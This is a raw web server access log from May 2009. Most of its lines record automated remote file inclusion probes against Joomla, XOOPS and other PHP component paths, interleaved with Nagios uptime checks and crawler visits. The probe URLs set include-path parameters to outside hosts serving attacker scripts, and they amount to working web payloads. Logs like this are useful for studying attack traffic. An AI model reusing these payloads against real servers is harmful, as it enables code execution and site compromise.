89.223.3.98 - - [31/May/2009:04:31:09 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:04:31:09 -0400] "GET /logs/error_log.Q109051200%20%20/components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:04:31:09 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:04:31:37 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:04:31:37 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:04:31:37 -0400] "GET /logs/error_log.Q109051200%20%20/components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:04:31:51 -0400] "GET /index.php?conteudo=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:04:31:51 -0400] "GET /logs/index.php?conteudo=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
194.63.250.46 - - [31/May/2009:04:31:51 -0400] "GET /logs/error_log.Q109042900/index.php?conteudo=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
91.206.183.148 - - [31/May/2009:04:32:05 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.823"
91.206.183.148 - - [31/May/2009:04:32:05 -0400] "GET /logs/access_log.Q109051700/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.823"
91.206.183.148 - - [31/May/2009:04:32:05 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.823"
91.206.183.148 - - [31/May/2009:04:32:40 -0400] "GET /logs/error_log.Q108052600/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.823"
124.0.73.2 - - [31/May/2009:04:33:01 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
124.0.73.2 - - [31/May/2009:04:33:28 -0400] "GET /logs/access_log.Q109052200//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
91.206.183.148 - - [31/May/2009:04:33:37 -0400] "GET /logs/error_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.823"
91.206.183.148 - - [31/May/2009:04:33:37 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.823"
91.206.183.148 - - [31/May/2009:04:33:37 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.823"
91.206.183.148 - - [31/May/2009:04:33:37 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.823"
116.36.213.166 - - [31/May/2009:04:33:50 -0400] "GET /logs/access_log.Q108081500%20%20/?DOCUMENT_ROOT=http://stelsis.ru//templates/fxid.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:04:33:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
38.99.44.103 - - [31/May/2009:04:34:19 -0400] "GET /logs/error_log.Q108112600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
91.206.183.148 - - [31/May/2009:04:34:44 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.823"
91.206.183.148 - - [31/May/2009:04:34:44 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.823"
91.206.183.148 - - [31/May/2009:04:34:44 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
203.194.204.129 - - [31/May/2009:04:34:53 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:04:34:53 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:04:34:53 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:04:35:01 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:04:35:09 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:04:35:09 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:04:35:09 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:04:35:17 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
91.206.183.148 - - [31/May/2009:04:35:35 -0400] "GET /logs/error_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.823"
91.206.183.148 - - [31/May/2009:04:35:37 -0400] "GET /logs/error_log.Q109011700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.823"
91.206.183.148 - - [31/May/2009:04:35:37 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.823"
91.206.183.148 - - [31/May/2009:04:35:37 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.823"
218.246.20.221 - - [31/May/2009:04:35:49 -0400] "GET /logs/access_log.Q109052100///show.php?path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:04:35:49 -0400] "GET /logs///show.php?path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:04:36:00 -0400] "GET /logs/error_log.Q108103000/components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:04:36:06 -0400] "GET /logs/error_log.Q109051200/components/com_forum/download.php?phpbb_root_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
91.206.183.148 - - [31/May/2009:04:37:33 -0400] "GET /logs/access_log.Q108081500//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.823"
209.59.12.99 - - [31/May/2009:04:38:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.36.213.166 - - [31/May/2009:04:39:42 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:39:43 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:39:43 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:39:44 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:39:45 -0400] "GET /logs/access_log.Q109050300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:39:46 -0400] "GET /logs/access_log.Q109050300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:39:49 -0400] "GET /logs/access_log.Q109052300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:39:50 -0400] "GET /logs/access_log.Q109052300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:42:17 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:42:19 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.188.254.4 - - [31/May/2009:04:43:36 -0400] "GET /logs/access_log.Q109052200///?_SERVER[DOCUMENT_ROOT]=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.65"
209.59.12.99 - - [31/May/2009:04:43:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.206.183.148 - - [31/May/2009:04:45:34 -0400] "GET /logs/error_log.Q109011700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.823"
91.206.183.148 - - [31/May/2009:04:45:34 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.823"
91.206.183.148 - - [31/May/2009:04:45:34 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.823"
200.142.148.142 - - [31/May/2009:04:46:06 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
200.142.148.142 - - [31/May/2009:04:46:06 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:04:46:40 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:04:46:44 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:04:46:44 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.206.183.148 - - [31/May/2009:04:46:44 -0400] "GET /logs/access_log.Q108081500//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.823"
221.139.104.104 - - [31/May/2009:04:48:11 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:04:49:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.50.197.106 - - [31/May/2009:04:50:23 -0400] "GET /rss.php?phpraid_dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:04:50:23 -0400] "GET /logs/rss.php?phpraid_dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:04:50:23 -0400] "GET /logs/access_log.Q109050900%20%20/rss.php?phpraid_dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:04:50:25 -0400] "GET /rss.php?phpraid_dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:04:50:25 -0400] "GET /logs/rss.php?phpraid_dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:04:50:25 -0400] "GET /logs/access_log.Q109050900%20%20/rss.php?phpraid_dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:50:54 -0400] "GET /logs/access_log.Q109050300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:50:57 -0400] "GET /logs/access_log.Q109052300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
200.142.148.142 - - [31/May/2009:04:51:28 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.200.8.89 - - [31/May/2009:04:52:37 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vpk66.ru/images/stories/spreadd.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
209.200.8.89 - - [31/May/2009:04:52:37 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://vpk66.ru/images/stories/spreadd.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
209.200.8.89 - - [31/May/2009:04:52:37 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
209.200.8.89 - - [31/May/2009:04:52:37 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.50.197.106 - - [31/May/2009:04:52:50 -0400] "GET /logs/access_log.Q109050900/rss.php?phpraid_dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.50.197.106 - - [31/May/2009:04:53:04 -0400] "GET /logs/access_log.Q109050900/rss.php?phpraid_dir=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.98.152.188 - - [31/May/2009:04:56:11 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
209.59.12.99 - - [31/May/2009:04:56:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [31/May/2009:04:56:59 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.6.8.108 - - [31/May/2009:04:57:43 -0400] "GET /logs/access_log.Q108072400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.221.10.116 - - [31/May/2009:04:58:44 -0400] "GET ///modules/xfsection/modify.php?dir_module=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.221.10.116 - - [31/May/2009:04:58:44 -0400] "GET /logs///modules/xfsection/modify.php?dir_module=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
216.221.10.116 - - [31/May/2009:04:58:44 -0400] "GET /logs/access_log.Q109051000///modules/xfsection/modify.php?dir_module=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
216.221.10.116 - - [31/May/2009:04:58:47 -0400] "GET /logs/access_log.Q109051500///modules/xfsection/modify.php?dir_module=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:04:58:58 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:04:58:58 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:04:58:58 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:04:58:58 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:04:59:10 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:04:59:10 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:04:59:13 -0400] "GET /logs///modules/xfsection/modify.php?dir_module=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:04:59:13 -0400] "GET /logs/access_log.Q109051000///modules/xfsection/modify.php?dir_module=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:04:59:13 -0400] "GET ///modules/xfsection/modify.php?dir_module=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:04:59:13 -0400] "GET /logs/access_log.Q109051500///modules/xfsection/modify.php?dir_module=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:59:32 -0400] "GET /logs/access_log.Q109050300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:04:59:35 -0400] "GET /logs/access_log.Q109052300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.221.10.116 - - [31/May/2009:04:59:47 -0400] "GET /logs/access_log.Q109051000%20%20///modules/xfsection/modify.php?dir_module=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.221.10.116 - - [31/May/2009:04:59:48 -0400] "GET /logs/access_log.Q109051500%20%20///modules/xfsection/modify.php?dir_module=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
190.226.131.208 - - [31/May/2009:05:01:09 -0400] "GET /com_jpackhttp://www.gp.tu-berlin.de/Biopsychologie/_bio/old/id.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.808"
83.103.72.130 - - [31/May/2009:05:01:16 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:05:01:17 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:05:01:18 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:05:01:20 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:05:01:50 -0400] "GET /logs/error_log.Q109052100///show.php?path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:05:02:27 -0400] "GET /logs/access_log.Q109051000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:05:03:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [31/May/2009:05:03:15 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
203.188.254.4 - - [31/May/2009:05:03:31 -0400] "GET /logs/error_log.Q108091000//?_SERVER%5BDOCUMENT_ROOT%5D=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
203.188.254.4 - - [31/May/2009:05:03:31 -0400] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
203.188.254.4 - - [31/May/2009:05:03:32 -0400] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 200 3567 "-" "libwww-perl/5.65"
221.139.104.104 - - [31/May/2009:05:03:35 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:05:03:49 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:05:03:51 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
190.226.131.208 - - [31/May/2009:05:05:28 -0400] "GET /com_joomlaradiov5http://www.gp.tu-berlin.de/Biopsychologie/_bio/old/id.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.808"
